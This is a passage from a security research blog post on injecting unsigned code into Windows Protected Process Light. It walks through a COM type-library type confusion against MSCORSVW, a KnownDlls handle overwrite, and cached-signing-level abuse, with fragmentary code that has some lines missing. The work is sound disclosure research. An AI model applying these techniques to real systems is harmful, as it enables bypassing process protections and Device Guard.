 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE, &pStm);
 CoMarshalInterface(pStm, &IID_IClassFactory, &factory,                     MSHCTX_LOCAL, nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm, &length);
 WriteFile(hPipe, &length, sizeof(length));
 WriteFile(hPipe, buffer, length);

 // Set event to synchronize with parent.

 // Pump message loop to handle COM calls.

 // ...
This code is not quite what I expected. Rather than using the named pipe for the entire communication channel it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance, normally you’d register the factory using CoRegisterClassObject but that would make it accessible to all processes at the same security level so instead by using marshaling the connection can be left private only to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET, we can determine if it is implemented in .NET by querying for its interfaces, for example we use the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the _Object interface. There’s only one interface implemented, ICorSvcBindToWorker so let’s dig into that interface to see if there’s anything we can exploit.
Something caught my eye, in the screenshot there’s a HasTypeLib column, for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is rather than the interface’s proxy code being implemented using an predefined NDR byte stream it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is a normal proxy would be loaded as a DLL which means that it must meet the PPL signing level requirements; however a type library is just data so can be loaded into a PPL without any signing level violations.
How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:
interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
             [in] BSTR pRuntimeVersion,
             [in] unsigned long ParentProcessID,
             [in] BSTR pInterruptEventName,
             [in] ICorSvcLogger* pCorSvcLogger,
             [out] ICorSvcWorker** pCorSvcWorker);
The single BindToRuntimeWorker takes 5 parameters, 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling to a pointer before calling the real function. For example imagine a simpler function, DoSomething which takes a single IUnknown pointer. The marshaling process looks like the following:
The operation of the method call is as follow:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from before issue 1112. For example if we modifying the type library to pass an integer instead of an interface pointer we get the following:
The operation of the marshal now changes as follows:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implement method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:
struct FakeObject {
   BSTR FakeVTable;
If we pass a pointer to a FakeObject instead of the interface pointer the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs so this will create a pointer to an object, which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.
To fully exploit this we’d need to call a suitable method, probably running a ROP chain and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.KnownDlls and Protected Processes.In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator to PPL code injection as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation not section mapping as long as you can place an entry into KnownDlls you can load anything into a PPL even unsigned code.
This doesn’t immediately seem that useful, we can’t write to KnownDlls without being an administrator, and even then without some clever tricks. However it’s worth looking at how a Known DLL is loaded to get an understanding on how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL.
NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle) {
 // If KnownDll directory handle not open then return error.
 if (!LdrpKnownDllDirectoryHandle)

 OBJECT_ATTRIBUTES ObjectAttributes;

 return NtOpenSection(SectionHandle,
The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path, instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path as the lookup with be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:
NTSTATUS LdrpInitializeProcess() {
 // ...
 PPEB peb = // ...
 // If a full protected process don't use KnownDlls.
 if (peb->IsProtectedProcess && !peb->IsProtectedProcessLight) {
   LdrpKnownDllDirectoryHandle = nullptr;
 } else {
   OBJECT_ATTRIBUTES ObjectAttributes;
   RtlInitUnicodeString(&DirName, L"\\KnownDlls");
                              nullptr, nullptr);
   // Open KnownDlls directory.
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
This code shouldn’t be that unexpected, the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in the LdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.
How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution resulting in a data only attack. As we can inherit any handles we like into the new PPL process we can setup an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG.
All we need is a suitable primitive to write an arbitrary value, unfortunately while I could find methods which would cause an arbitrary write I couldn’t sufficiently control the value being written. In the end I used the following interface and method which was implemented on the object returned by ICorSvcBindToWorker::BindToRuntimeWorker.
interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
           [in] OptimizationScenario scenario,
           [in] ICorSvcLogger* pCorSvcLogger,
           [out] long* pCanContinue);
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64 bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fake KnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.Elevating to PPL-Windows TCBWe can’t stop here, attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that generating a fake cached signed DLL should run in a PPL as well as Microsoft leaving a backdoor for PPL processes at any signing level I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE which will run as PPL Windows TCB we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing level in some way, perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.
After discussing this a bit with Alex Ionescu I decided to put together a quick parser with information from Alex for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02), however for the system binary PowerShell couldn’t decode the enumeration and so just outputs the integer value of 66 which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. In the full trace artifacts of checking the full signature are shown such as enumerating catalog files, I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically, the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call to NtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL so that subsequent image mapping don’t need to recheck the signature. It’s possible to map an image section from a file with write access so we can reuse the same attack from Issue 1332 and replace the call to NtSetCachedSigningLevel with NtCreateSection and we can fake sign any DLL. It turned out that the call to set the file cache happened after the write check introducted to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597 which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB. ConclusionsThis blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this new found power? Actually not a great deal as a normal user but there are some parts of the OS, such as the Windows Store which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack such as CSRSS (through which you can certainly get kernel code execution) or attack Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.
Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows although it might be fixed in the next major version. Previously confirming Microsoft’s policy on fixing a particular security issue was based on precedent, however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria which, as shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd. I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix it’s still somewhat arbitrary. A secure feature is rarely secure in isolation, the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.
Categories: Security


Subscribe to www.hdgonline.net aggregator